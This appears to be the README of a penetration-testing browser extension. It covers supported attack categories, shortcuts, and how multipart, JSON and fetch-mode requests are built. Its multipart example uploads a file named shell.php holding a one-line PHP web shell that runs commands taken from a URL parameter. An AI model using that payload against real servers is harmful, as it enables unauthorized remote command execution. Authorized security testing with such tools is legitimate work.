A browser extension for Penetration Testing
A browser extension for Penetration Testing.
Available on Chrome Web Store and Firefox Add-ons.
storage
scripting
webRequest
declarativeNetRequest
Load
Supported
Auto Test
SQLi
XSS
LFI
SSRF
SSTI
Shell
Encoding
Hashing
F12
or Ctrl + Shift + I
)Description | Shortcut |
---|---|
Load | Alt + A |
Split | Alt + S |
Execute | Alt + X |
Mode | Alt + M |
After changing enctype field to multipart/form-data
, you can put your payload into Body field such as the following:
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"
user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php
<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--
We will consider the first line as boundary, and reconstruct a form element to send your request.
Therefore, sent boundary will not be the same as you typed.
After changing enctype field to application/json
, you can put your payload into Body field such as the following:
{
"username": "admin",
"password": "admin"
}
If your payload doesn't contain =
:
In order to post JSON data, we will insert a dummy field or object to your JSON such as the following:
{ "username": "admin", "password": "admin", "4dxnzjzd5mi": "=" }
For more details, please visit "Posting JSON with an HTML Form".
This mode is implemented via fetch
API. It will try the best to send a request as same as you typed.
However, there are some limitations:
Request
The protocol version is fixed to
HTTP/1.1
in the editor, but what version used in a request is up tofetch
behavior.
Connection
, Cache-Control
, Pragma
, etc.
These headers will be assigned a default value. For example,
Connection: keep-alive
,Cache-Control: no-cache
.
Response
HTTP/1.1
if used protocol version is higher than or equal to HTTP/2.
See also Chromium Code Search
See package.json
for details.